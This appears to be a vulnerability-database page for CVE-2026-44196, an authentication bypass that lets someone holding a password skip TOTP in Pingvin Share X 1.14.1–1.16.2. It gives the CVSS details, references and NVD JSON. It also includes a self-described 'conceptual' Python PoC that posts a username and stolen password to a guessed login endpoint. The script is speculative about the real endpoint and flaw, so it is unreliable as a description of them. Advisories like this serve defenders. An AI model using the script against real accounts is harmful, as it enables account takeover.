CVE-2026-44196

Description

Pingvin Share X is a secure and easy self-hosted file sharing platform. From 1.14.1 to 1.16.2, a critical authentication bypass vulnerability allows an attacker who has obtained a valid username and password to skip the second-factor authentication (TOTP) requirement entirely. Although, an attacker still needs the user's password to reach this stage. This vulnerability is fixed in 1.16.3.

CVSS Details

CVSS Score

9.1

Severity

CRITICAL

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N

Configurations (Affected Products)

No configuration data available.

Pingvin Share X >= 1.14.1, <= 1.16.2

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests # Conceptual PoC for CVE-2026-44196 # This script demonstrates a login attempt that bypasses TOTP check. # Note: The specific endpoint and parameters depend on the actual application implementation. target_url = "http://target-pingvin-share/api/login" username = "[email protected]" password = "stolen_password" # Payload containing only username and password, omitting TOTP code payload = { "username": username, "password": password # In a vulnerable version, the server might accept this without 'totp_code' } try: response = requests.post(target_url, json=payload) if response.status_code == 200: print("[+] Authentication bypass successful! Token received.") print(f"[+] Response: {response.text}") else: print("[-] Login failed.") except Exception as e: print(f"Error: {e}")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-44196
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-44196
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-44196/
[4] VulDB https://vuldb.com/cve/CVE-2026-44196
[5] https://github.com/smp46/pingvin-share-x/security/advisories/GHSA-j679-vp39-qwqq

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-44196", "sourceIdentifier": "[email protected]", "published": "2026-05-12T18:17:29.730", "lastModified": "2026-05-12T18:17:29.730", "vulnStatus": "Received", "cveTags": [], "descriptions": [{"lang": "en", "value": "Pingvin Share X is a secure and easy self-hosted file sharing platform. From 1.14.1 to 1.16.2, a critical authentication bypass vulnerability allows an attacker who has obtained a valid username and password to skip the second-factor authentication (TOTP) requirement entirely. Although, an attacker still needs the user's password to reach this stage. This vulnerability is fixed in 1.16.3."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N", "baseScore": 9.1, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 5.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-287"}, {"lang": "en", "value": "CWE-697"}]}], "references": [{"url": "https://github.com/smp46/pingvin-share-x/security/advisories/GHSA-j679-vp39-qwqq", "source": "[email protected]"}]}}